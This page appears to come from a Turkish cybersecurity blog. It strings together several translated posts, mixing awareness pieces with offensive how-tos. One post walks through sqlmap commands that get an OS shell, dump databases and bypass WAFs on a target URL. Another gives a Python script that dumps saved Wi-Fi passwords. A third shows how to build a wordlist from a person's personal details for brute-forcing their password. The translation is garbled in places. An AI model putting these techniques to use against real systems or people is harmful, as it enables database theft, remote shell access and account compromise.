Home Blog

About Clean Code – Bug and Security

0
clean code bugs and security issues
clean code bugs and security issues

One of the components of the smooth operation of any application (in addition to stable servers, load balancing, and more) is clean code. However, is clean code possible in real life, or is it just a programmer’s dream? Where do vulnerabilities come from and how to avoid bugs?

Each programming language is designed with a different operating system, platform, coding style, and intended use in mind. We usually hear about the languages ​​Python, PHP, Ruby, JavaScript, Java, C, C ++ and C #, as well as more modern flavors such as Rust, Swift, Hack, and many others.

“Programming is the art of communicating to another person what he wants from a computer.” Donald Knuth

What is Clean Code?

When it comes to clean code, we present perfectly thought-out strings. This is the code that was planned out before it was written. So well planned that it works flawlessly and flawlessly on first launch.

However, real programming is much more difficult:

No matter what you do, mistakes are hard to avoid. Doubt about your own fitness continues to grow, and a mistake that you thought would take five minutes to fix ultimately takes hours. In addition, the function you were about to implement turned into a major problem for the project.

In this case, it is important to keep in mind that it is impossible to write perfect code right away. This requires many hours of deliberation and detailed planning. Here, everyone chooses for himself what is more priority: writing clean code or speed of work.

Code Objectivity

Clean code is objectively good code. It is written as succinctly and elegantly as possible, without duplication. It is structured to be easy to read by both humans and computers. Anyone can write computer-readable code, but only a good programmer can write human-readable code.

Sloppy code is expensive and time consuming and effortful to maintain. In addition, the code is more prone to errors that can cause the program to crash.

It should be understood that clean code is a product of collaboration, where everyone on the team needs to understand the code. This optimizes work in the event of a change in the composition of the team and greatly simplifies refactoring and debugging.

Basic concepts

Refactoring is the process of optimizing a program code without changing its external behavior in order to improve performance, readability, testability, or maintainability. Basically, with refactoring, you improve the design of the code after it has been written.

Debugging is fixing bugs in your code.

However, even clean code has an expiration date. Software and computing exist in a rapidly changing landscape. Code that used to be clean is deprecated.

Basic concepts
Deprecated code is code that is not maintained or updated, but is used. It works or not, and no one understands why. The older the code in your codebase, the harder it is to understand, no matter how well written it is.

As a result, while the codebase may be clean from the outset, the need to scale, change, and new requirements can lead to contamination.

Criteria by which the code can be considered clean:

No code redundancy
The code must comply with the DRY (Don’t repeat yourself) rule. This means that any change in one area should not require changes in others.

Minimum dependencies
If your code has many dependencies, it is more difficult to maintain or change in the future.

Minimum extensions
The code should contain a minimum number of both classes (templates for creating objects that provide initial values ​​for states) and methods (functions or procedures belonging to a particular class or object.

Functionality and code readability
The code should be simple, convenient and understandable so that any developer can quickly read it. To do this, many developers use the KISS (keep it simple and straightforward) and YAGNI (You aren’t gonna need it) rules.

Code analysis
Use language static analysis tools to inspect your code.

Code quality and safety
The high quality of the software does not in itself imply that the software is secure. The absence of vulnerabilities in the code is still not a mandatory requirement for most development companies.

Why is security fading into the background?
In the development world today, functionality and speed outweigh safety. Enterprises cannot stay ahead of the competition without creating and releasing new features in a short time frame.

Security is not a competitive differentiator: Consumers don’t think about security when using an app or buying a smart device, be it a smart thermostat or a light bulb. Recall an incident from 2020 when a drone was able to hack smart light bulbs

Using Advanced SQLmap

0
Using Advanced SQLmap for operating systems
Using Advanced SQLmap for operating systems

What is SQLmap?

Sqlmap is a very useful Sql injection tool developed in pyhton language. Basically, it scans the relevant website by trying SQL Payload combinations on the target website according to the parameters you specify.

So what are the advantages of SQLmap? :

After giving just a few parameters to run, it can scan the target faster than you can by trying dozens of open tests and storing the results it finds. At the same time, other database names, etc., depending on the permissions of the current user on the server. it can install a shell on the server according to the commands you can find and give.

How to Install SQLmap? :

In Windows Operating Systems;

First of all, in order to run it, you need to install Python on your system, download and install it from here. After that, download the SQL map file from Github. You can download it from here. After installing the necessary files from the links I have given, you can start using SQL map without any problems.

In Linux Operating Systems

In operating systems created for penetration tests such as Kali Linux, it comes ready-made. On other Linux operating systems, if you have installed the Git command before;

  • git clone https://github.com/sqlmapproject/sqlmap.git

if you haven’t installed it, before this command

With the command, you need to install the Git command first.

In Mac OS Operating System

According to the statistics I’ve seen, I show you how to install it on Mac OS, as there are too many Mac OS users visiting our website 🙂

Firstly;

  • ruby -e “$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)” < /dev/null 2> /dev/null

Install Homebrew with this command.

Then you can install SQL map on your system using this command.

SQLmap Usage:

Now that we have done everything necessary to use it, we can move on to advanced SQL map use.

First I start by giving the command to check if you have write permission on the Target Site. If you have write permission, you can shell the site using SQLmap.

  • sqlmap -u “target_url” -o -b –current-user –is-dba

As seen in the picture, when you get the output “current user is DBA: True”, it means you have write permission. If it says “False” where it says “True”, it means there is no authorization.

If it has write permission, that is, if it outputs “True”, you can enter the shell command.

  • sqlmap -u “target_url” -o -b –os-shell

After entering the command, SQLmap Shell will give the directory it uploaded. Of course, there is always nothing to give, there may be a security system on the site, or there may be errors caused by something else.

Now Pulling Database of Web-Site from Explicit URL:

Enter this command using the –dbs parameter to display the names of the site’s databases.

  • sqlmap -u “target_url” –dbs

After viewing the database names, enter this command using the –tables parameter to view the table names in the database.

  • sqlmap -u “target_url” -D database_name –tables

After viewing the tables in the database, enter this command using the –columns parameter to display the columns in the database.

  • sqlmap -u “target_url” -D database_name -T table_name –columns

After viewing the columns in the database, you can pull the contents of the desired column using the –dump parameter with this command.

  • sqlmap -u “target_url” -D database_name -T table_name -C column_name –dump

All captured data will be saved in the file path specified by SQL map.

 

Waf Bypass Parameter:

Waf stands for web application security panel. SQLmap can perform operations for you automatically by using Waf Bypass parameters. Enter the following command for SQL map Waf Bypass.

  • sqlmap -u “target_url” –dbs –tamper=space2comment

Batch Parameter:

SQL map asks the user during the operations, for example “A payload was found, continue the test?” Like, this parameter is the command that allows SQLmap to do everything automatically without asking the user any questions.

  • sqlmap -u “target_url” –dbs –batch

Random-Agent Parameter:

SQL map uses the user-agents registered in its own files when trying to payload to the target website with the help of this parameter.

  • sqlmap -u “target_url” –dbs –random-agent

Level and Risk Parameters:

When you apply these parameters on SQL map, it will try more payloads in the database, of course, this process will naturally slow down SQLmap.

  • sqlmap -u “target_url” –dbs –level=5 –risk=3

You can change the Level and risk value given here by yourself, the –level value between 1 and 5, and the –risk value between 1 and 3.

Finally, you can use the last parameters I gave together according to the situations.

E.g;

  • sqlmap -u “target_url” -D database_name -T table_name -C column_name –dump –tamper=space2comment –batch –random-agent –level=5 –risk=3

The parameters I gave were the most important parameters.

You can view all parameters using this command. If you have any questions, you can reach me from my social media accounts or specify them in the comments section.

Social Media Disasters

0


What is Social Media Disaster:

A social media disaster is when a brand or a well-known person is somehow humiliated by using social media, damaging its image and revealing things that not everyone should know. In this article, we have compiled the Social Media Disasters that have befallen major brands around the world.

McDonald’s

A foreign substance was found in a hamburger taken from a McDonald’s restaurant in Temuco, 700 km south of Chile’s capital, Santiago. After the customer claimed that the foreign substance was the tail of a mouse through his social media networks, the food health authorities started an investigation and it was confirmed that the substance was the tail of a mouse. Thereupon, the restaurant was closed and the incident exploded on social media networks. After this social media disaster, McDonald’s sales, especially in Chile, decreased drastically.

BlackBerry

As Canada-based technology company Blackberry tries everything to regain the popularity it once enjoyed, a great misfortune has come upon it. Blackberry, which shared the new BlackBerry Classic model on its official Twitter account, shared from an Iphone device, although Twitter is specific to their phones.

Burger King

Someone working at Burger King took a picture of him stepping on the lettuce boxes and shared it on social media platforms. Later, this image started to be shared on news sites with the headline “The lettuce you ate at Burger King”. Thereupon, Burger King officials collected the GPS data in the photo and determined where the photo was taken, and fired the employee. However, internal work was done and Burger King’s brand image was damaged as a result of this social media disaster.

American Red Cross

Gloria Huang, Twitter Administrator of Redd Cross, America’s Red Crescent, accidentally threw the tweet that she would publish from her own account from her brand account. The message read, “My friend Ryan just found two more of a four-pack of Dogfish Head beer. If we drink, we will drink like men.” Moreover, the message was deleted only 1 hour after it was posted on the brand account. Huang later explained that it was due to his misuse of the program he used for twitter from his own account and apologized. Later, American Redd Cross sent an urgent message from its own account and announced that they deleted this tweet and that Redd Cross is definitely not an alcoholic and continues to work seriously. Thus, they apologized to their followers with a slightly humorous message.

Cybercriminals Are Targeting Elders

0


During the Pandemic Period, We Have Elders at the Target of Cyber ​​Criminals.


The process of staying at home during the pandemic took a long time for the elderly. The increasing use of technology by the elderly group has opened a new door of opportunity for cybercriminals. Cyber ​​security guards give warnings and suggestions by stating that the elderly should not be left alone against the increasing attacks.

With the prolongation of the stay at home, there has been a significant increase in the number of our elders on social media platforms. The use of technology has increased in our elders as in everyone else. More video chats are preferred. Meeting applications such as Zoom have been instrumental in bringing together distant acquaintances.

With this process, an increase in financial frauds and hacking incidents has begun to be observed in the older age group, where digital literacy is less. Cybersecurity experts noted a significant lack of awareness in the older adult group. Seniors are not very aware of the dangers they may face on the Internet, from criminals trying to obtain their personal or financial information. Fake bank e-mails, phishing e-mails from GSM operators disguised as bills, their awareness of protecting their personal data is quite low.

We should help our elders in this regard and raise their awareness as much as we can. During the pandemic period, we should understand our elders, who are especially targeted, and give them information about cyber security.

How Do Antivirus Programs Work?

0


What is Antivirus Program? :

Antivirus Programs are the main programs to be installed after the Operating System is installed on a computer. The main purpose of the antivirus program is to prevent all kinds of malicious software that can harm your computer or steal your personal information. These malicious software can infect your computer over the network, with any USB memory stick you insert into your system, or with a file you download from the internet.

How to Use Antivirus Programs? :

Care should be taken when choosing Antivirus Programs, because they have too much authority on your system and reliable software such as Kaspersky and Eset should be used. At the same time, crack software should be avoided because these software make changes to the main software so that it does not receive updates, which makes you vulnerable to new threats that come out every day, and many of them can even damage the system. We, as www.siberguvenlikblogu.com, recommend using free versions or free trial versions of Anti virus programs instead of Crack software.

What are the Working Principles of Antivirus Programs? :

Antivirus is the firewall at the main exit points of your computer. It analyzes whether there is a risk for your system by connecting to servers to examine a file that enters your computer, or by scanning the file in the database it downloads in compressed packages, and takes action according to your request for the security of your system.

Making the Computer Safer

0


For you, our valued visitors, we have compiled the things you can do to make your systems more secure:

No matter how hard you try to protect your system, you always leave doors open. What matters is how few doors you leave open.

We have prepared an article for what needs to be done to have a more secure system. By following these simple rules, you can prevent your data from falling into unwanted hands and other undesirable situations.

Use Antivirus Programs

It is very important to use antivirus software for the security of your system and network. It provides high-level protection for you. You can use antivirus software of some big companies. You can find the article about the working principles and logic of Antivirus Programs here.

Checking Ports

Many attacks can be prevented with Windows Firewall. But some programs usually open some ports on the firewall in order to be able to update. With the opening of these ports, we give an opening to enter our computer. It is useful to take a look at which programs are allowed to enter our computer from the Firewall section of the Control Panel. Except for the programs we have installed and are sure of, we must cancel the programs that appear here and that we do not know what they are.

Pay Attention to the Sites You Login to

While navigating various web pages, we may need to enter our personal passwords. The program we use in such obligations automatically asks for the user name and password to be entered automatically next time. We should not forget that such automatic remembering means writing down our username and password somewhere on our computer. People who attack our computer for malicious purposes can find them and hijack your accounts. Therefore, although it may seem practical, it is useful to stay away from such automatic remembering and enter our username and password manually as much as possible.

Pay Attention to Incoming Mails

All the measures we take are generally to stop attacks from outside. In general, it does not aim to stop an active user. For this reason, if we open the e-mail from a person we do not know and activate the program in it, the measures we take will be in vain. The easiest way to get rid of this is to delete Emails from people we don’t know without opening them. Many e-mail sending and receiving programs or Web pages have taken precautions against such incoming spam. It would be useful to activate these measures.

Keep Your System Up-to-Date

The best way to close many vulnerabilities is to install updates that companies make for their programs. Thanks to these updates, almost all the vulnerabilities found in the programs are closed. It is one of the best solutions to check the updates of the programs installed on our computer, even once a week, or to activate automatic updates if the program has support.

How to Learn Wifi Passwords with Python?

0


Python: It is a high level programming language. It is written with simple syntax based on indentation. This programming language is very easy to learn and remember compared to other programming languages. Django, Zope application servers, Youtube and Original Bittorrent clients are some of the important projects created using Python. Also Google, NASA and Cern Large institutions such as Python use Python. In the future, articles about this programming language that we love to use will continue to come, stay tuned.

Now, let’s come to our code, using the “subprocess” library, you will be able to view all the previously logged in Wifi passwords and names in the system. If you wish, you can show this program to your relatives and look like you are hacking the Wifi, this is of course the fun of the job 🙂

Here is our Code:


print("""Wifi Görüntüleyici

-www.siberguvenlikblogu.com-
""")

import time

while True:

import subprocess

print("Sistem analiz ediliyor")
import time

time.sleep(

1)print("Bulunan Wifiler: ")

veri = subprocess.check_output([

'netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('n')
sistemler = [i.split(
":")[1][1:-1] for i in veri if "All User Profile" in i]
for i in sistemler:
sonuç = subprocess.check_output([
'netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split(
'n')
sonuç = [b.split(
":")[1][1:-1] for b in sonuç if "Key Content" in b]
try:
print(" \{:<30}| Şifre: {:<}".format(i, sonuç[0]))
except IndexError:
print(" \{:<30}| Şifre: {:<}".format(i, ""))

exe =

int(input("n n n1'e basarak yeniden sistemi analiz edebilirsiniz n2'ye basarak çıkış yapabilirsiniz "))
if (exe == 1):
print("")
import time

time.sleep(

1)elif (exe == 2):
print("")
import time

time.sleep(1

)
break
quit()else:
print("Bir hata yaptınız lütfen tekrar deneyin")

Hackers Stole Data of 26 Million Users!

0


It turned out that the user data of dozens of companies, including giants such as Facebook, Apple, Netflix and Instagram, was stolen for 2 years!


It has been announced that hackers have seized 26 million user login information of many important companies, including giant names such as Amazon, Apple and Facebook, between 2018 and 2020. Credit card information used to make payments from 3.25 million Windows computers was also reportedly stolen, as a result of a new malware disclosed by security company NordLocker. 1.2 terabytes of data filled with stolen information are fragmented and offered for sale on the Deep Web. Other companies whose accounts were targeted include eBay, Instagram, Netflix, Paypal, Roblox, Steam, Twitch and Twitter.

As a result of cyber attacks carried out with a new RAT, namely “remote acces trojan” remote access trojan, social media accounts and credit card information of many users were stolen. Cybersecurity experts are worried that the balance sheet of this malware, which antivirus programs cannot detect, may be heavier than it seems. cyber security company The new malware detected as a result of the files examined by NordLocker affects Windows systems.

Creating a Custom Worldlist for Brute Force

0


What is Worldlist: It is a word (password) list created with many word and password combinations. It is used in the Brute Force attack, which is also mentioned in this article, which is used to log into the target system or a user’s private system. Some versions may consist of millions of words (passwords).

After this article, you will be able to create a personalized Worldist, that is, a Worldlist created by using what we know about the target, without the need for long Worldists for the person’s password, in Brute Force attacks.

At the same time, in order to protect you and your relatives from this attack, I will give you an open source, Python language program that generates very hard to crack passwords with characters against Brute Force attacks, which we have written, in line with the purpose of our website siberguvenlikblogu.com.

Now Let’s Come To Custom Worldlist Creation Program Cupp.py:

This program creates a Worldlist using known information against the target system or person. Thus, considering that most people today use publicly known personal information in their passwords, the probability of finding the target’s password in Brute Force attacks increases significantly.

I will show you how to use our program on Kali Linux, which is designed for cyber security. You can use it on different operating systems if you wish:

First you download our tool “git clone” command;

git clone https://github.com/Mebus/cupp.git

Then you run our tool by logging into the download location.

On the screen that comes up, the program shows us the parameters, we will use the “-i” parameter;

python3 cupp.py -i

With this parameter, the tool will ask us for information about the target;

Take care to enter as much as you can, then it asks what can be added optionally. My suggestion is to choose the options as seen in the screenshot, but again, the last part is used to add completely optional extra numbers or special characters. By the way, be careful not to use Turkish characters because there are no Turkish characters in passwords 🙂

Now, a Tool for Complete Protection from This Attack

As I mentioned at the beginning, you will be able to generate completely random high-security passwords with the help of this admin-safe tool.

Our vehicle;

To use this tool written in Python language, the “colorama” library must be installed on your system.

You can install it with the command and you can use the application easily.

Decode Any Kind of Hash with Python

0


What is Hash: The password software used when registering for a site is automatically converted into a seemingly random set of characters called “Hashes” into the database. For example, when the password created as “password” is Hash created with the MD5 encryption method, “8cdee5526476b101869401a37c03e379” We obtain this password in encrypted form. The password is saved in a Hash form in the database of the site. When you want to log in to the site, the password you type is converted to Hash by the system and compared with the Hash in the database. If the Hashs match, the login is obtained successfully. .

Hashes are impossible to crack, but hashes that have previously matched a password can be found by saving them to a decryption database and matching them from the database. To keep your passwords secure, you must set a password that is not used by everyone. In this way, even if the site you log into is hacked, your passwords will not be accessible. However, the “password” password we have given as an example in this text has been previously saved in databases and is known, so we can decrypt the Hash.

How to Decrypt Hashes Saved to Databases:

Now let’s come to our main topic, I said that Hashes can never be solved. How come you can decode any Hash with Python? As I said, millions of Hashs have been registered in decryption databases so far. I will give, thanks to the tool I wrote, it scans the Hash entered automatically from all online Hash decoding sites and you can decode almost all previously recorded Hash.

This tool automatically scans the Hash you entered on the best decryption sites on the market, giving you results found.

The parameter that is sufficient for you; The “-s” parameter is the other parameters, which can be understood and used by those who have developed themselves a little more in software.

Libraries required to use this tool

“argparse

concurrent.futures”

The command required to use this tool for its most basic purpose is;

python3 tool.py -s cozulecek_hash

https://github.com/emyounoone/hash-cracker

You can download and start using it here.

Universities Under Intense Cyber ​​Attack

0

Turkish Government Sites, Universities and Company Sites Under Intense Cyber ​​Attack

Recently, Turkish websites have been under intense cyber attack. These attacks; leaking data, indexing the site (unauthorized modification of the site’s home page). In recent months, there have been intense cyber attacks on the sites and systems of Turkish companies, no matter how small or large. Likewise, the subdomains of Çukurova University, Necmettin Erbakan University, Recep Tayyip Erdoğan University and Iğdır University were hacked by a group of hackers, whose code names were “GaskmanTR, Xale, Yuba, Mutarrif, RootSploiX”.

In the pictures and messages posted on the websites of universities whose subdomains were hacked, there were words against the increase in violence against women and child rape. Against hacking incidents, which have increased especially against State Universities in recent months; We hope that the measures will be tightened even more.

You can access the Attack Records from these links:

Çukurova University: https://mirror-h.org/zone/2904064/

Necmettin Erbakan University: https://mirror-h.org/zone/2902508/

Recep Tayyip Erdogan University: https://mirror-h.org/zone/2902566/

Iğdır University: https://mirror-h.org/zone/2900777/

en_USEnglish